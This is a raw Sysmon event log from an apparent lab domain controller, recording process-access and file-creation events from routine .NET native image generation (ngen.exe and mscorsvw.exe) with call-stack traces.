13:48:04.295{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9194-6005-CC02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.264{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9194-6005-CC02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.264{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9194-6005-CC02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.123{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9194-6005-CB02-00000000A301}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.123{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9194-6005-CB02-00000000A301}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:04.123{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9194-6005-CB02-00000000A301}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:04.045{59A5CD1D-9193-6005-CA02-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12a0-0\System.Web.Entity.Design.dll2021-01-18 13:48:04.045 10341000x80000000000000007048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:05.186{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9195-6005-CF02-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.170{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9195-6005-CF02-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:05.170{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9195-6005-CF02-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9195-6005-CE02-00000000A301}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.014{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9195-6005-CE02-00000000A301}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.014{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9195-6005-CE02-00000000A301}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.826{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9196-6005-D102-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.811{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9196-6005-D102-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:06.811{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9196-6005-D102-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.779{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9196-6005-D002-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.779{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9196-6005-D002-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.779{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9196-6005-D002-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:06.654{59A5CD1D-9195-6005-CF02-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1010-0\System.Web.Mobile.dll2021-01-18 13:48:06.654 10341000x80000000000000007069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.404{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9197-6005-D502-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.389{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9197-6005-D502-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:07.389{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9197-6005-D502-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.279{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9197-6005-D402-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.264{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9197-6005-D402-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.264{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9197-6005-D402-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
